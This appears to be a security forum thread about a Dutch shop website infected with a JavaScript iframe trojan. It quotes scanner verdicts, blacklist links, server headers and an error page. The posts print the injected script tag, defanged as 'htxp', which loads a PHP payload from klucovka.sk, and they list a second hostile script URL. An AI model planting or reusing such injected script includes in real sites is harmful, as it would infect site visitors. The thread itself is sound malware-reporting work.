JS:Iframe-AEL [Trj] detected on website!

Viruses and worms
1

See: http://killmalware.com/goedkooptekoop.com/ 15 hours ago!
I get a

{"result": 0, "verbose_msg": "Invalid URL"}

Three blacklist flags: https://www.virustotal.com/nl/url/09f0d69d0242afac39b14d2b786e5504d3ba0420c8b3c66a4fef60f7faa15e83/analysis/1420993495
IP badness status: https://www.virustotal.com/nl/ip-address/94.124.93.162/information/
Avast detects this malware kicked up from IP domain: JS:Iframe-AMJ [Trj]
Malicious Reason: Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details: Malicious obfuscated JavaScript threat

<!--321809--><script type="text/javascript" src="htxp://klucovka.sk/mqc4kwpj.php?id=20644204"></script><!--/321809-->

and Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2 Javascript: -klucovka.sk (Netblock owner - -ns1.keurigonline22.nl → http://www.dnsinspect.com/keurigonline22.nl/1420993895 (monor issues). hoster: http://www.dnsinspect.com/cj2hosting.nl/1420994026
http://www.seomastering.com/hosting/Keurigonline%20blok%202/
4 on blacklist: http://sitevet.com/db/asn/AS39704 as malicious URLs and badware,
Blacklisted external link: http://sitecheck.sucuri.net/results/klucovka.sk
List of scripts included
htxp://www.fireworx.be/bk36wn2p.php?id=2325145

HTTP/1.1 302 Found
Date: Sun, 11 Jan 2015 16:40:44 GMT
Server: Apache
X-Powered-By: PHP/5.4.35
Location: http://localhost/
Content-Length: 1
Content-Type: text/html

In the response body we get Apache/2.2.22 (Linux/SUSE) and we know Outdated Server Software is involved.
Reached via GET //localhost/ HTTP/1.1
Host: localhost

 
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Access forbidden!</title>
<link rev="made" href="mailto:%5bno%20address%20given%5d" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/ 
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>

<body>
<h1>Access forbidden!</h1>
<p>




You don't have permission to access the requested directory.
There is either no index document or the directory is read-protected.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 403</h2>
<address>
<a href="/">localhost</a>


<span>Sun Jan 11 17:43:40 2015

Apache/2.2.22 (Linux/SUSE)</span>
</address>
</body>
</html>

See: http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-142323/Apache-Http-Server-2.2.22.html

polonus

2

Read: http://www.engadget.com/2014/10/06/cowl-web-privacy/
See results here: http://jsunpack.jeek.org/?report=96fae4c9ad74e532a0609bee0396c8e3b0f52246
For security research only, open above link up inside browser with NoScript extension active and inside a VM/sandbox.
See: http://fetch.scritch.org/%2Bfetch/?url=goedkooptekoop.com%2F+&useragent=Fetch+useragent&accept_encoding=
→ htxp://klucovka.sk/mqc4kwpj.php?id=20644204 (see: http://fetch.scritch.org/%2Bfetch/?url=goedkooptekoop.com%2F+&useragent=Fetch+useragent&accept_encoding=)

polonus